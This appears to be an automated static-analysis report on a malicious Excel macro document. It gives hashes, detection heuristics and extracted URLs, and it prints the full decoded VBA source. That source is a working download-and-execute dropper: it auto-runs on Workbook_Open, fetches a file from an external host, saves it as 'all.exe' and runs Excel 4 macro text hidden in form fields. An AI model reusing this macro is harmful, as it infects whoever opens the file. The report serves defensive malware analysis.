Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9a1cde5e4e066932…

MALICIOUS

Office (OLE)

147.5 KB Created: 2019-05-18 07:27:21 Authoring application: Microsoft Excel First seen: 2021-04-10
MD5: 98dd2b2ab44502731941bfb3b33316f0 SHA-1: ceb68a619dd39cca9537cfe4d426dd36cf20b698 SHA-256: 9a1cde5e4e066932debff522b48144ddcf9507955b618cd99815853a230a0ebe
270 Risk Score

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6995334-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6995334-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        .write UserForm8.Stack1.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set UserForm8.ProAsO1 = CreateObject(UserForm8.Label2.Caption)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub WorkBook_open()
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://bascif.com/tt1 Referenced by macro
    • http://t2.symcb.com0Referenced by macro
    • http://tl.symcd.com0&Referenced by macro
    • http://ns.adobe.com/xap/1.0/Referenced by macro
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
    • http://ns.adobe.com/photoshop/1.0/Referenced by macro
    • http://purl.org/dc/elements/1.1/Referenced by macro
    • http://ns.adobe.com/xap/1.0/mm/Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
    • http://t1.symcb.com/ThawtePCA.crl0Referenced by macro
    • http://tl.symcb.com/tl.crl0Referenced by macro
    • https://www.thawte.com/cps0/Referenced by macro
    • https://www.thawte.com/repository0WReferenced by macro
    • http://tl.symcb.com/tl.crt0Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas🔏 SignedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.
vba-macro oletools.olevba.extract_macros (decoded VBA source) 2991 bytes
SHA-256: 83171ad241b6229bd9b9c3c6f4b2e5b9af00520ff6b3b3e5e7025433b423243e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_open()
UserForm7.Show



End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub Anykey()
Dim time
time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")

ExecuteExcel4Macro "MESSAGE(True, ""release"")"
#If Juliet Then

Dim varSet5
Dim varSet6
Dim varSet7
Dim varSet9
Dim varSet8
Dim varSet11
Dim varSet12


#End If
End Sub



Attribute VB_Name = "UserForm8"
Attribute VB_Base = "0{4E02938E-31ED-4B39-9CF2-7B2D3926817E}{1AB7E616-12BE-48D9-AF15-467C948DFF4D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
 Public ProAsO1 As Object
Public Stack1 As Object
 Public ProAsO2 As Object
Public Stack2 As Object
 Public ProAsO3 As Object
Public Stack3 As Object



Public Sub Label5_Click()
Dim varSet5
Stack1.Open Me.Label3.Caption, Me.TextBox3.Tag, False
Dim varSet6
End Sub

Public Sub S1000()

End Sub
Public Sub frfr4()

End Sub

Private Sub UserForm_Click()

End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub stvb113()

Sheet1.Anykey


Set UserForm8.ProAsO1 = CreateObject(UserForm8.Label2.Caption)
Dim varSet4

Set UserForm8.Stack1 = CreateObject(UserForm8.Label1.Caption)
Dim varSet3
UserForm8.Label5_Click
UserForm8.Stack1.Send

With UserForm8.ProAsO1
    .Type = 1
End With
    UserForm8.ProAsO1.Open
With UserForm8.ProAsO1
    .write UserForm8.Stack1.responseBody

End With
#If Romeo Then
    UserForm8.ProAsO1.savetofile "all.e" & "xe", 2

#End If

End Sub

Attribute VB_Name = "UserForm7"
Attribute VB_Base = "0{D08B52F0-0485-4D2A-B95C-1D2B5DA1C733}{A550A1B3-7AE1-42F4-944B-573CACD6D0DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()

    Dim c As New Class1
c.stvb113

    ExecuteExcel4Macro UserForm8.TextBox3.Text
ExecuteExcel4Macro "MESSAGE(True, ""9999"")"
Unload Me
End Sub